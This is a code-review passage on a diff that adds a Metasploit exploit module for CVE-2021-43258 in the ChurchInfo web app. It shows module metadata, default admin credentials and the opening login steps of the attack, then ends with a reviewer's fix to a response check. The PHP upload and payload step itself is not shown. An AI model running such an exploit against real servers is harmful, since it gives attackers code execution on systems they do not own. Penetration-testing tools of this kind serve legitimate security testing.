modules/exploits/multi/http/churchinfo_upload_exec.rb

```diff
@@ -0,0 +1,183 @@
+          ['CVE', '2021-43258']
+        ],
+        'Platform' => 'php',
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [['Automatic Targeting', { 'auto' => true }]],
+        'DisclosureDate' => '2021-10-30',
+        'DefaultTarget' => 0,
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_fs_delete_file
+            ]
+          }
+        },
+        'Notes' => {
+          'Stability' => ['CRASH_SAFE'],
+          'Reliability' => ['REPEATABLE_SESSION'],
+          'SideEffects' => ['ARTIFACTS_ON_DISK', 'IOC_IN_LOGS']
+        }
+      )
+    )
+    # Set the email subject and message if interested
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [true, 'Username for ChurchInfo application', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']),
+        OptString.new('APPBASE', [true, 'The location of the ChurchInfo app', '/churchinfo/']),
+        OptString.new('EMAIL_SUBJ', [true, 'Email subject in webapp', 'Exploit Subj']),
+        OptString.new('EMAIL_MESG', [true, 'Email message in webapp', 'Here\'s a lovely message'])
+      ]
+    )
+
+    self.needs_cleanup = true
+  end
+
+  #
+  # The exploit method attempts a login, adds items to the cart, then creates the email attachment.
+  # Adding items to the cart is required for the server-side code to accept the upload.
+  #
+
+  def exploit
+    # Need to gather cookie value first to pass to application
+    vprint_status('Gathering PHP session cookie')
+    if datastore['SSL'] == true
+      vprint_status('SSL is true, changing Proto parameter in URL')
+      login_page = datastore['APPBASE'] + 'Default.php?Proto=https&Path=' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '%2F' + datastore['APPBASE']
+    else
+      vprint_status('SSL is false, leaving Proto parameter as http')
+      login_page = datastore['APPBASE'] + 'Default.php?Proto=http&Path=' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '%2F' + datastore['APPBASE']
+    end
+    vprint_status("Login page is #{login_page}")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, login_page),
+      'method' => 'GET'
+    )
+
+    # Grab our assigned session cookie
+    cookie = res.get_cookies
+    vprint_good("PHP session cookie is #{cookie}")
+    vprint_status('Attempting login')
+
+    # Attempt a login with the cookie assigned, server will assign privs on server-side if authenticated
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, login_page),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'vars_post' => {
+        'User' => datastore['USERNAME'],
+        'Password' => datastore['PASSWORD'],
+        'sURLPath' => login_page
+      }
+    )
+
+    # a valid login will give us a 302 redirect to CheckVersion.php so check that.
+    if res && res.code != 302
```

Comment:
You probably want `unless res && res.code == 302`. If `res` is nil because the request failed, then this will continue on to say that it was logged in.
```suggestion
    unless res && res.code == 302
```